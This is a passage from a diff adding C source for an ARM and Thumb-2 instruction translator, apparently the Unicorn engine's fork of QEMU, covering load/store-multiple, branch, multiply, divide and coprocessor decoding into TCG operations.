(1 << 20)) { + /* Complete the load. */ + store_reg_from_load(s, rd, tmp); + } + break; + case 0x08: + case 0x09: + { + int j, n, user, loaded_base; + TCGv_i32 loaded_var; + /* load/store multiple words */ + /* XXX: store correct base if write back */ + user = 0; + if (insn & (1 << 22)) { + if (IS_USER(s)) + goto illegal_op; /* only usable in supervisor mode */ + + if ((insn & (1 << 15)) == 0) + user = 1; + } + rn = (insn >> 16) & 0xf; + addr = load_reg(s, rn); + + /* compute total size */ + loaded_base = 0; + TCGV_UNUSED_I32(loaded_var); + n = 0; + for(i=0;i<16;i++) { + if (insn & (1 << i)) + n++; + } + /* XXX: test invalid n == 0 case ? */ + if (insn & (1 << 23)) { + if (insn & (1 << 24)) { + /* pre increment */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } else { + /* post increment */ + } + } else { + if (insn & (1 << 24)) { + /* pre decrement */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4)); + } else { + /* post decrement */ + if (n != 1) + tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4)); + } + } + j = 0; + for(i=0;i<16;i++) { + if (insn & (1 << i)) { + if (insn & (1 << 20)) { + /* load */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + if (user) { + tmp2 = tcg_const_i32(tcg_ctx, i); + gen_helper_set_user_reg(tcg_ctx, tcg_ctx->cpu_env, tmp2, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + } else if (i == rn) { + loaded_var = tmp; + loaded_base = 1; + } else { + store_reg_from_load(s, i, tmp); + } + } else { + /* store */ + if (i == 15) { + /* special case: r15 = PC + 8 */ + val = (long)s->pc + 4; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + } else if (user) { + tmp = tcg_temp_new_i32(tcg_ctx); + tmp2 = tcg_const_i32(tcg_ctx, i); + gen_helper_get_user_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else { + tmp = load_reg(s, i); + } + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); 
+ } + j++; + /* no need to add after the last transfer */ + if (j != n) + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } + if (insn & (1 << 21)) { + /* write back */ + if (insn & (1 << 23)) { + if (insn & (1 << 24)) { + /* pre increment */ + } else { + /* post increment */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } else { + if (insn & (1 << 24)) { + /* pre decrement */ + if (n != 1) + tcg_gen_addi_i32(tcg_ctx, addr, addr, -((n - 1) * 4)); + } else { + /* post decrement */ + tcg_gen_addi_i32(tcg_ctx, addr, addr, -(n * 4)); + } + } + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + if (loaded_base) { + store_reg(s, rn, loaded_var); + } + if ((insn & (1 << 22)) && !user) { + /* Restore CPSR from SPSR. */ + tmp = load_cpu_field(s->uc, spsr); + gen_set_cpsr(s, tmp, CPSR_ERET_MASK); + tcg_temp_free_i32(tcg_ctx, tmp); + s->is_jmp = DISAS_UPDATE; + } + } + break; + case 0xa: + case 0xb: + { + int32_t offset; + + /* branch (and link) */ + val = (int32_t)s->pc; + if (insn & (1 << 24)) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + store_reg(s, 14, tmp); + } + offset = sextract32(insn << 2, 0, 26); + val += offset + 4; + gen_jmp(s, val); + } + break; + case 0xc: + case 0xd: + case 0xe: + if (((insn >> 8) & 0xe) == 10) { + /* VFP. */ + if (disas_vfp_insn(s, insn)) { + goto illegal_op; + } + } else if (disas_coproc_insn(s, insn)) { + /* Coprocessor. */ + goto illegal_op; + } + break; + case 0xf: // qq + /* swi */ + gen_set_pc_im(s, s->pc); + s->svc_imm = extract32(insn, 0, 24); + s->is_jmp = DISAS_SWI; + break; + default: + illegal_op: + gen_exception_insn(s, 4, EXCP_UDEF, syn_uncategorized()); + break; + } + } +} + +/* Return true if this is a Thumb-2 logical op. */ +static int +thumb2_logic_op(int op) +{ + return (op < 8); +} + +/* Generate code for a Thumb-2 data processing operation. If CONDS is nonzero + then set condition code flags based on the result of the operation. 
+ If SHIFTER_OUT is nonzero then set the carry flag for logical operations + to the high bit of T1. + Returns zero if the opcode is valid. */ + +static int +gen_thumb2_data_op(DisasContext *s, int op, int conds, uint32_t shifter_out, + TCGv_i32 t0, TCGv_i32 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int logic_cc; + + logic_cc = 0; + switch (op) { + case 0: /* and */ + tcg_gen_and_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 1: /* bic */ + tcg_gen_andc_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 2: /* orr */ + tcg_gen_or_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 3: /* orn */ + tcg_gen_orc_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 4: /* eor */ + tcg_gen_xor_i32(tcg_ctx, t0, t0, t1); + logic_cc = conds; + break; + case 8: /* add */ + if (conds) + gen_add_CC(s, t0, t0, t1); + else + tcg_gen_add_i32(tcg_ctx, t0, t0, t1); + break; + case 10: /* adc */ + if (conds) + gen_adc_CC(s, t0, t0, t1); + else + gen_adc(s, t0, t1); + break; + case 11: /* sbc */ + if (conds) { + gen_sbc_CC(s, t0, t0, t1); + } else { + gen_sub_carry(s, t0, t0, t1); + } + break; + case 13: /* sub */ + if (conds) + gen_sub_CC(s, t0, t0, t1); + else + tcg_gen_sub_i32(tcg_ctx, t0, t0, t1); + break; + case 14: /* rsb */ + if (conds) + gen_sub_CC(s, t0, t1, t0); + else + tcg_gen_sub_i32(tcg_ctx, t0, t1, t0); + break; + default: /* 5, 6, 7, 9, 12, 15. */ + return 1; + } + if (logic_cc) { + gen_logic_CC(s, t0); + if (shifter_out) + gen_set_CF_bit31(s, t1); + } + return 0; +} + +/* Translate a 32-bit thumb instruction. Returns nonzero if the instruction + is not legal. 
*/ +static int disas_thumb2_insn(CPUARMState *env, DisasContext *s, uint16_t insn_hw1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t insn, imm, shift, offset; + uint32_t rd, rn, rm, rs; + TCGv_i32 tmp; + TCGv_i32 tmp2; + TCGv_i32 tmp3; + TCGv_i32 addr; + TCGv_i64 tmp64; + int op; + int shiftop; + int conds; + int logic_cc; + + if (!(arm_dc_feature(s, ARM_FEATURE_THUMB2) + || arm_dc_feature(s, ARM_FEATURE_M))) { + /* Thumb-1 cores may need to treat bl and blx as a pair of + 16-bit instructions to get correct prefetch abort behavior. */ + insn = insn_hw1; + if ((insn & (1 << 12)) == 0) { + ARCH(5); + /* Second half of blx. */ + offset = ((insn & 0x7ff) << 1); + tmp = load_reg(s, 14); + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xfffffffc); + + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, s->pc | 1); + store_reg(s, 14, tmp2); + gen_bx(s, tmp); + return 0; + } + if (insn & (1 << 11)) { + /* Second half of bl. */ + offset = ((insn & 0x7ff) << 1) | 1; + tmp = load_reg(s, 14); + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); + + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp2, s->pc | 1); + store_reg(s, 14, tmp2); + gen_bx(s, tmp); + return 0; + } + if ((s->pc & ~TARGET_PAGE_MASK) == 0) { + /* Instruction spans a page boundary. Implement it as two + 16-bit instructions in case the second half causes an + prefetch abort. */ + offset = ((int32_t)insn << 21) >> 9; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->pc + 2 + offset); + return 0; + } + /* Fall through to 32-bit decode. */ + } + + insn = arm_lduw_code(env, s->pc, s->bswap_code); + s->pc += 2; + insn |= (uint32_t)insn_hw1 << 16; + + if ((insn & 0xf800e800) != 0xf000e800) { + ARCH(6T2); + } + + rn = (insn >> 16) & 0xf; + rs = (insn >> 12) & 0xf; + rd = (insn >> 8) & 0xf; + rm = insn & 0xf; + switch ((insn >> 25) & 0xf) { + case 0: case 1: case 2: case 3: + /* 16-bit instructions. Should never happen. 
*/ + abort(); + case 4: + if (insn & (1 << 22)) { + /* Other load/store, table branch. */ + if (insn & 0x01200000) { + /* Load/store doubleword. */ + if (rn == 15) { + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc & ~3); + } else { + addr = load_reg(s, rn); + } + offset = (insn & 0xff) * 4; + if ((insn & (1 << 23)) == 0) + offset = 0-offset; + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + offset = 0; + } + if (insn & (1 << 20)) { + /* ldrd */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rs, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + store_reg(s, rd, tmp); + } else { + /* strd */ + tmp = load_reg(s, rs); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp = load_reg(s, rd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + if (insn & (1 << 21)) { + /* Base writeback. */ + if (rn == 15) + goto illegal_op; + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset - 4); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } else if ((insn & (1 << 23)) == 0) { + /* Load/store exclusive word. */ + addr = tcg_temp_local_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + tcg_gen_addi_i32(tcg_ctx, addr, addr, (insn & 0xff) << 2); + if (insn & (1 << 20)) { + gen_load_exclusive(s, rs, 15, addr, 2); + } else { + gen_store_exclusive(s, rd, rs, 15, addr, 2); + } + tcg_temp_free_i32(tcg_ctx, addr); + } else if ((insn & (7 << 5)) == 0) { + /* Table Branch. 
*/ + if (rn == 15) { + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, addr, s->pc); + } else { + addr = load_reg(s, rn); + } + tmp = load_reg(s, rm); + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + if (insn & (1 << 4)) { + /* tbh */ + tcg_gen_add_i32(tcg_ctx, addr, addr, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + } else { /* tbb */ + tcg_temp_free_i32(tcg_ctx, tmp); + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + } + tcg_temp_free_i32(tcg_ctx, addr); + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 1); + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, s->pc); + store_reg(s, 15, tmp); + } else { + int op2 = (insn >> 6) & 0x3; + op = (insn >> 4) & 0x3; + switch (op2) { + case 0: + goto illegal_op; + case 1: + /* Load/store exclusive byte/halfword/doubleword */ + if (op == 2) { + goto illegal_op; + } + ARCH(7); + break; + case 2: + /* Load-acquire/store-release */ + if (op == 3) { + goto illegal_op; + } + /* Fall through */ + case 3: + /* Load-acquire/store-release exclusive */ + ARCH(8); + break; + } + addr = tcg_temp_local_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + if (!(op2 & 1)) { + if (insn & (1 << 20)) { + tmp = tcg_temp_new_i32(tcg_ctx); + switch (op) { + case 0: /* ldab */ + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 1: /* ldah */ + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* lda */ + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + store_reg(s, rs, tmp); + } else { + tmp = load_reg(s, rs); + switch (op) { + case 0: /* stlb */ + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 1: /* stlh */ + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + case 2: /* stl */ + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + default: + abort(); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + } else if (insn & (1 << 20)) { + gen_load_exclusive(s, rs, 
rd, addr, op); + } else { + gen_store_exclusive(s, rm, rs, rd, addr, op); + } + tcg_temp_free_i32(tcg_ctx, addr); + } + } else { + /* Load/store multiple, RFE, SRS. */ + if (((insn >> 23) & 1) == ((insn >> 24) & 1)) { + /* RFE, SRS: not available in user mode or on M profile */ + if (IS_USER(s) || arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + if (insn & (1 << 20)) { + /* rfe */ + addr = load_reg(s, rn); + if ((insn & (1 << 24)) == 0) + tcg_gen_addi_i32(tcg_ctx, addr, addr, -8); + /* Load PC into tmp and CPSR into tmp2. */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp2 = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp2, addr, get_mem_index(s)); + if (insn & (1 << 21)) { + /* Base writeback. */ + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } else { + tcg_gen_addi_i32(tcg_ctx, addr, addr, -4); + } + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + gen_rfe(s, tmp, tmp2); + } else { + /* srs */ + gen_srs(s, (insn & 0x1f), (insn & (1 << 24)) ? 1 : 2, + insn & (1 << 21)); + } + } else { + int i, loaded_base = 0; + TCGv_i32 loaded_var; + /* Load/store multiple. */ + addr = load_reg(s, rn); + offset = 0; + for (i = 0; i < 16; i++) { + if (insn & (1 << i)) + offset += 4; + } + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-offset); + } + + TCGV_UNUSED_I32(loaded_var); + for (i = 0; i < 16; i++) { + if ((insn & (1 << i)) == 0) + continue; + if (insn & (1 << 20)) { + /* Load. */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + if (i == 15) { + gen_bx(s, tmp); + } else if (i == rn) { + loaded_var = tmp; + loaded_base = 1; + } else { + store_reg(s, i, tmp); + } + } else { + /* Store. 
*/ + tmp = load_reg(s, i); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + if (loaded_base) { + store_reg(s, rn, loaded_var); + } + if (insn & (1 << 21)) { + /* Base register writeback. */ + if (insn & (1 << 24)) { + tcg_gen_addi_i32(tcg_ctx, addr, addr, 0-offset); + } + /* Fault if writeback register is in register list. */ + if (insn & (1 << rn)) + goto illegal_op; + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + } + } + break; + case 5: + + op = (insn >> 21) & 0xf; + if (op == 6) { + /* Halfword pack. */ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + shift = ((insn >> 10) & 0x1c) | ((insn >> 6) & 0x3); + if (insn & (1 << 5)) { + /* pkhtb */ + if (shift == 0) + shift = 31; + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff0000); + tcg_gen_ext16u_i32(tcg_ctx, tmp2, tmp2); + } else { + /* pkhbt */ + if (shift) + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, shift); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff0000); + } + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else { + /* Data processing register constant shift. */ + if (rn == 15) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } else { + tmp = load_reg(s, rn); + } + tmp2 = load_reg(s, rm); + + shiftop = (insn >> 4) & 3; + shift = ((insn >> 6) & 3) | ((insn >> 10) & 0x1c); + conds = (insn & (1 << 20)) != 0; + logic_cc = (conds && thumb2_logic_op(op)); + gen_arm_shift_im(s, tmp2, shiftop, shift, logic_cc); + if (gen_thumb2_data_op(s, op, conds, 0, tmp, tmp2)) + goto illegal_op; + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rd != 15) { + store_reg(s, rd, tmp); + } else { + tcg_temp_free_i32(tcg_ctx, tmp); + } + } + break; + case 13: /* Misc data processing. 
*/ + op = ((insn >> 22) & 6) | ((insn >> 7) & 1); + if (op < 4 && (insn & 0xf000) != 0xf000) + goto illegal_op; + switch (op) { + case 0: /* Register controlled shift. */ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if ((insn & 0x70) != 0) + goto illegal_op; + op = (insn >> 21) & 3; + logic_cc = (insn & (1 << 20)) != 0; + gen_arm_shift_reg(s, tmp, op, tmp2, logic_cc); + if (logic_cc) + gen_logic_CC(s, tmp); + store_reg_bx(s, rd, tmp); + break; + case 1: /* Sign/zero extend. */ + tmp = load_reg(s, rm); + shift = (insn >> 4) & 3; + /* ??? In many cases it's not necessary to do a + rotate, a shift is sufficient. */ + if (shift != 0) + tcg_gen_rotri_i32(tcg_ctx, tmp, tmp, shift * 8); + op = (insn >> 20) & 7; + switch (op) { + case 0: gen_sxth(tmp); break; + case 1: gen_uxth(tmp); break; + case 2: gen_sxtb16(tmp); break; + case 3: gen_uxtb16(tmp); break; + case 4: gen_sxtb(tmp); break; + case 5: gen_uxtb(tmp); break; + default: goto illegal_op; + } + if (rn != 15) { + tmp2 = load_reg(s, rn); + if ((op >> 1) == 1) { + gen_add16(s, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } + store_reg(s, rd, tmp); + break; + case 2: /* SIMD add/subtract. */ + op = (insn >> 20) & 7; + shift = (insn >> 4) & 7; + if ((op & 3) == 3 || (shift & 3) == 3) + goto illegal_op; + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + gen_thumb2_parallel_addsub(s, op, shift, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + break; + case 3: /* Other data processing. */ + op = ((insn >> 17) & 0x38) | ((insn >> 4) & 7); + if (op < 4) { + /* Saturating add/subtract. 
*/ + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if (op & 1) + gen_helper_double_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); + if (op & 2) + gen_helper_sub_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp2, tmp); + else + gen_helper_add_saturate(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } else { + tmp = load_reg(s, rn); + switch (op) { + case 0x0a: /* rbit */ + gen_helper_rbit(tcg_ctx, tmp, tmp); + break; + case 0x08: /* rev */ + tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); + break; + case 0x09: /* rev16 */ + gen_rev16(s, tmp); + break; + case 0x0b: /* revsh */ + gen_revsh(s, tmp); + break; + case 0x10: /* sel */ + tmp2 = load_reg(s, rm); + tmp3 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp3, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + gen_helper_sel_flags(tcg_ctx, tmp, tmp3, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 0x18: /* clz */ + gen_helper_clz(tcg_ctx, tmp, tmp); + break; + case 0x20: + case 0x21: + case 0x22: + case 0x28: + case 0x29: + case 0x2a: + { + /* crc32/crc32c */ + uint32_t sz = op & 0x3; + uint32_t c = op & 0x8; + + if (!arm_dc_feature(s, ARM_FEATURE_CRC)) { + goto illegal_op; + } + + tmp2 = load_reg(s, rm); + if (sz == 0) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xff); + } else if (sz == 1) { + tcg_gen_andi_i32(tcg_ctx, tmp2, tmp2, 0xffff); + } + tmp3 = tcg_const_i32(tcg_ctx, 1 << sz); + if (c) { + gen_helper_crc32c(tcg_ctx, tmp, tmp, tmp2, tmp3); + } else { + gen_helper_crc32(tcg_ctx, tmp, tmp, tmp2, tmp3); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + break; + } + default: + goto illegal_op; + } + } + store_reg(s, rd, tmp); + break; + case 4: case 5: /* 32-bit multiply. Sum of absolute differences. 
*/ + op = (insn >> 4) & 0xf; + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + switch ((insn >> 20) & 7) { + case 0: /* 32 x 32 -> 32 */ + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) { + tmp2 = load_reg(s, rs); + if (op) + tcg_gen_sub_i32(tcg_ctx, tmp, tmp2, tmp); + else + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 1: /* 16 x 16 -> 32 */ + gen_mulxy(s, tmp, tmp2, op & 2, op & 1); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) { + tmp2 = load_reg(s, rs); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 2: /* Dual multiply add. */ + case 4: /* Dual multiply subtract. */ + if (op) + gen_swap_half(s, tmp2); + gen_smul_dual(s, tmp, tmp2); + if (insn & (1 << 22)) { + /* This subtraction cannot overflow. */ + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } else { + /* This addition cannot overflow 32 bits; + * however it may overflow considered as a signed + * operation, in which case we must set the Q flag. 
+ */ + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) + { + tmp2 = load_reg(s, rs); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 3: /* 32 * 16 -> 32msb */ + if (op) + tcg_gen_sari_i32(tcg_ctx, tmp2, tmp2, 16); + else + gen_sxth(tmp2); + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 16); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + if (rs != 15) + { + tmp2 = load_reg(s, rs); + gen_helper_add_setq(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + case 5: case 6: /* 32 * 32 -> 32msb (SMMUL, SMMLA, SMMLS) */ + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + if (rs != 15) { + tmp = load_reg(s, rs); + if (insn & (1 << 20)) { + tmp64 = gen_addq_msw(s, tmp64, tmp); + } else { + tmp64 = gen_subq_msw(s, tmp64, tmp); + } + } + if (insn & (1 << 4)) { + tcg_gen_addi_i64(tcg_ctx, tmp64, tmp64, 0x80000000u); + } + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + break; + case 7: /* Unsigned sum of absolute differences. */ + gen_helper_usad8(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + if (rs != 15) { + tmp2 = load_reg(s, rs); + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + break; + } + store_reg(s, rd, tmp); + break; + case 6: case 7: /* 64-bit multiply, Divide. 
*/ + op = ((insn >> 4) & 0xf) | ((insn >> 16) & 0x70); + tmp = load_reg(s, rn); + tmp2 = load_reg(s, rm); + if ((op & 0x50) == 0x10) { + /* sdiv, udiv */ + if (!arm_dc_feature(s, ARM_FEATURE_THUMB_DIV)) { + goto illegal_op; + } + if (op & 0x20) + gen_helper_udiv(tcg_ctx, tmp, tmp, tmp2); + else + gen_helper_sdiv(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + store_reg(s, rd, tmp); + } else if ((op & 0xe) == 0xc) { + /* Dual multiply accumulate long. */ + if (op & 1) + gen_swap_half(s, tmp2); + gen_smul_dual(s, tmp, tmp2); + if (op & 0x10) { + tcg_gen_sub_i32(tcg_ctx, tmp, tmp, tmp2); + } else { + tcg_gen_add_i32(tcg_ctx, tmp, tmp, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + /* BUGFIX */ + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_addq(s, tmp64, rs, rd); + gen_storeq_reg(s, rs, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (op & 0x20) { + /* Unsigned 64-bit multiply */ + tmp64 = gen_mulu_i64_i32(s, tmp, tmp2); + } else { + if (op & 8) { + /* smlalxy */ + gen_mulxy(s, tmp, tmp2, op & 2, op & 1); + tcg_temp_free_i32(tcg_ctx, tmp2); + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ext_i32_i64(tcg_ctx, tmp64, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + /* Signed 64-bit multiply */ + tmp64 = gen_muls_i64_i32(s, tmp, tmp2); + } + } + if (op & 4) { + /* umaal */ + gen_addq_lo(s, tmp64, rs); + gen_addq_lo(s, tmp64, rd); + } else if (op & 0x40) { + /* 64-bit accumulate. */ + gen_addq(s, tmp64, rs, rd); + } + gen_storeq_reg(s, rs, rd, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + } + break; + } + break; + case 6: case 7: case 14: case 15: + /* Coprocessor. */ + if (((insn >> 24) & 3) == 3) { + /* Translate into the equivalent ARM encoding. 
*/ + insn = (insn & 0xe2ffffff) | ((insn & (1 << 28)) >> 4) | (1 << 28); + if (disas_neon_data_insn(s, insn)) { + goto illegal_op; + } + } else if (((insn >> 8) & 0xe) == 10) { + if (disas_vfp_insn(s, insn)) { + goto illegal_op; + } + } else { + if (insn & (1 << 28)) + goto illegal_op; + if (disas_coproc_insn(s, insn)) { + goto illegal_op; + } + } + break; + case 8: case 9: case 10: case 11: + if (insn & (1 << 15)) { + /* Branches, misc control. */ + if (insn & 0x5000) { + /* Unconditional branch. */ + /* signextend(hw1[10:0]) -> offset[:12]. */ + offset = ((int32_t)(insn << 5)) >> 9 & ~(int32_t)0xfff; + /* hw1[10:0] -> offset[11:1]. */ + offset |= (insn & 0x7ff) << 1; + /* (~hw2[13, 11] ^ offset[24]) -> offset[23,22] + offset[24:22] already have the same value because of the + sign extension above. */ + offset ^= ((~insn) & (1 << 13)) << 10; + offset ^= ((~insn) & (1 << 11)) << 11; + + if (insn & (1 << 14)) { + /* Branch and link. */ + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[14], s->pc | 1); + } + + offset += s->pc; + if (insn & (1 << 12)) { + /* b/bl */ + gen_jmp(s, offset); + } else { + /* blx */ + offset &= ~(uint32_t)2; + /* thumb2 bx, no need to check */ + gen_bx_im(s, offset); + } + } else if (((insn >> 23) & 7) == 7) { + /* Misc control */ + if (insn & (1 << 13)) + goto illegal_op; + + if (insn & (1 << 26)) { + if (!(insn & (1 << 20))) { + /* Hypervisor call (v7) */ + int imm16 = extract32(insn, 16, 4) << 12 + | extract32(insn, 0, 12); + ARCH(7); + if (IS_USER(s)) { + goto illegal_op; + } + gen_hvc(s, imm16); + } else { + /* Secure monitor call (v6+) */ + ARCH(6K); + if (IS_USER(s)) { + goto illegal_op; + } + gen_smc(s); + } + } else { + op = (insn >> 20) & 7; + switch (op) { + case 0: /* msr cpsr. 
